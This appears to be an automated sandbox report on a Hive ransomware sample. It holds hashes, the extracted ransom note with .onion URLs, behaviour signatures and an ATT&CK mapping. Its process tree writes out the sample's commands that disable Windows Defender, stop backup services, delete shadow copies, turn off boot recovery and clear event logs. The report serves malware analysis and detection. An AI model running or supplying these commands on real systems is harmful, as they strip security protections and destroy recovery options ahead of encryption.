Analysis

  • max time kernel
    144s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 04:52

General

  • Target

    a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

  • Size

    2.1MB

  • MD5

    a0b0432294ebbc84d306993e2e7ea91c

  • SHA1

    217f15f8048cb52b529bcad20c687422c9a29add

  • SHA256

    1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3

  • SHA512

    1dc1884893156b400f5c9aa0c7a922ca6a06758771f70a560c82f2b3078ae2fde9b21b797236e4d7dcd3db866d3afee18b6acee3124224c5b0aca8376afced61

  • SSDEEP

    49152:0Whc2Iyefi4Cvv5mGb9dPaBq9MuAp3JwMLerDclJyA:9Qq6gz95Ap3JBeAJyA

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\eTbd_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: PaupCumZiMEX Password: pDsYabqq3GNX4rJxYXZe To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.rwbwj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\system32\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1616
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:2652
      • C:\Windows\system32\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:2964
        • C:\Windows\system32\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:2588
          • C:\Windows\system32\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2564
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:2640
            • C:\Windows\system32\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2572
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:2476
              • C:\Windows\system32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2608
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:2360
                • C:\Windows\system32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2956
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1672
                  • C:\Windows\system32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2600
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:2348
                    • C:\Windows\system32\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2368
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SamSs" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2428
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SDRSVC" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2896
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SstpSvc" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2036
                    • C:\Windows\system32\sc.exe
                      sc.exe config "UI0Detect" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1760
                    • C:\Windows\system32\sc.exe
                      sc.exe config "VSS" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:656
                    • C:\Windows\system32\sc.exe
                      sc.exe config "wbengine" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:436
                    • C:\Windows\system32\sc.exe
                      sc.exe config "WebClient" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1488
                    • C:\Windows\system32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:2660
                      • C:\Windows\system32\reg.exe
                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        2⤵
                          PID:2716
                        • C:\Windows\system32\reg.exe
                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                          2⤵
                            PID:2724
                          • C:\Windows\system32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            2⤵
                              PID:2752
                            • C:\Windows\system32\reg.exe
                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                              2⤵
                                PID:2756
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1708
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1852
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1816
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1044
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:2292
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                2⤵
                                  PID:2100
                                • C:\Windows\system32\reg.exe
                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:2552
                                  • C:\Windows\system32\reg.exe
                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:2672
                                    • C:\Windows\system32\reg.exe
                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:2624
                                      • C:\Windows\system32\reg.exe
                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:1728
                                        • C:\Windows\system32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:1328
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                            2⤵
                                              PID:1352
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                              2⤵
                                                PID:1140
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                2⤵
                                                  PID:1952
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  2⤵
                                                    PID:1940
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                    2⤵
                                                      PID:1920
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                      2⤵
                                                        PID:2800
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                        2⤵
                                                          PID:1980
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                          2⤵
                                                            PID:3004
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                            2⤵
                                                              PID:2008
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                              2⤵
                                                                PID:892
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                2⤵
                                                                  PID:2080
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                  2⤵
                                                                    PID:2132
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                    2⤵
                                                                      PID:1972
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                      2⤵
                                                                        PID:1008
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                        2⤵
                                                                          PID:1756
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                          • Modifies security service
                                                                          PID:1032
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                            PID:1908
                                                                          • C:\Windows\system32\vssadmin.exe
                                                                            vssadmin.exe delete shadows /all /quiet
                                                                            2⤵
                                                                            • Interacts with shadow copies
                                                                            PID:972
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl system
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:928
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl security
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2212
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl application
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1776
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:620
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe shadowcopy delete
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1968
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:1748
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:752
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                            2⤵
                                                                              PID:1520
                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                3⤵
                                                                                • Deletes Windows Defender Definitions
                                                                                PID:864
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                              2⤵
                                                                                PID:3024
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  3⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1732
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                2⤵
                                                                                  PID:2588
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2640

                                                                              Network

                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                              Execution

                                                                              Command and Scripting Interpreter

                                                                              1
                                                                              T1059

                                                                              Persistence

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Privilege Escalation

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Defense Evasion

                                                                              Impair Defenses

                                                                              2
                                                                              T1562

                                                                              Disable or Modify Tools

                                                                              1
                                                                              T1562.001

                                                                              Modify Registry

                                                                              2
                                                                              T1112

                                                                              Indicator Removal

                                                                              3
                                                                              T1070

                                                                              File Deletion

                                                                              2
                                                                              T1070.004

                                                                              Credential Access

                                                                              Unsecured Credentials

                                                                              1
                                                                              T1552

                                                                              Credentials In Files

                                                                              1
                                                                              T1552.001

                                                                              Discovery

                                                                              Query Registry

                                                                              1
                                                                              T1012

                                                                              Collection

                                                                              Data from Local System

                                                                              1
                                                                              T1005

                                                                              Impact

                                                                              Inhibit System Recovery

                                                                              3
                                                                              T1490

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\eTbd_HOW_TO_DECRYPT.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                9215e2ac5b68b7ecb9ec8699d7c4c16a

                                                                                SHA1

                                                                                dc23bb7faf774d90b36e8d8c090c6b70663728c1

                                                                                SHA256

                                                                                a4544cf7d82ea7f78472ecfe937dc0a54d808e62f4a16b96f71538064e6c1820

                                                                                SHA512

                                                                                b2367fe5221486c004167d30ac7c89a47f9ddfdd9307b9a066955526177911429bfd57425aae96ceced7822a64888c9b3eb0c1caf87a0e5723de3450b07de70f

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSVNUKCLFD0XHB7O143J.temp
                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                da9506314df3bc10df360b8583f5c5dc

                                                                                SHA1

                                                                                cdd600e39abdaae4ae72437efe2720a0ead03e54

                                                                                SHA256

                                                                                830b53ebf6842777f07c7c326fb2bb6605dcabeb29fce05268ddbdc5c266258c

                                                                                SHA512

                                                                                11369a918bf0453df94585f8f48bf6e2277642e110dc7df5c94fbc3bf6b8460104aa09712a69cb971fee4455f468b3e7e2253cfbeb4277c473fe58572a40cece

                                                                              • F:\temp3.swap.rwbwj
                                                                                Filesize

                                                                                36.1MB

                                                                                MD5

                                                                                2fe34c24067dee6bfc42c0d64a03f78b

                                                                                SHA1

                                                                                8889e05e2f57ce4f6507a0f7645dd1f6d630832b

                                                                                SHA256

                                                                                63250ae43aa9eaae4a9a256c99102d5a0e87663318310a56cffa9ee19dca44b5

                                                                                SHA512

                                                                                92334ed7c4b3c78b0ef987c19ba07fb8ed432952fe884986fa1c93e2edf61f5c631d31ed2a584d6a085937cc0428913347ec3f7e3a2e4838cd0abb81fabbc07b

                                                                              • memory/1732-16-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/1732-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/1732-12-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/1732-13-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/1732-14-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/1732-15-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/1732-9-0x000000001B3C0000-0x000000001B6A2000-memory.dmp
                                                                                Filesize

                                                                                2.9MB

                                                                              • memory/1732-10-0x0000000002490000-0x0000000002498000-memory.dmp
                                                                                Filesize

                                                                                32KB

                                                                              • memory/2640-22-0x000000001B570000-0x000000001B852000-memory.dmp
                                                                                Filesize

                                                                                2.9MB

                                                                              • memory/2640-23-0x0000000002360000-0x0000000002368000-memory.dmp
                                                                                Filesize

                                                                                32KB

                                                                              • memory/2640-24-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2640-25-0x0000000001F20000-0x0000000001FA0000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2640-28-0x0000000001F20000-0x0000000001FA0000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2640-27-0x0000000001F20000-0x0000000001FA0000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2640-26-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2640-29-0x0000000001F20000-0x0000000001FA0000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2640-30-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2852-392-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8055-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-3182-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-6683-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-7392-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-7393-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-7394-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-0-0x0000000001D50000-0x0000000001F54000-memory.dmp
                                                                                Filesize

                                                                                2.0MB

                                                                              • memory/2852-8053-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-140-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8056-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8059-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8060-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8063-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8065-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-8066-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB

                                                                              • memory/2852-1-0x000000013F930000-0x000000013FD10000-memory.dmp
                                                                                Filesize

                                                                                3.9MB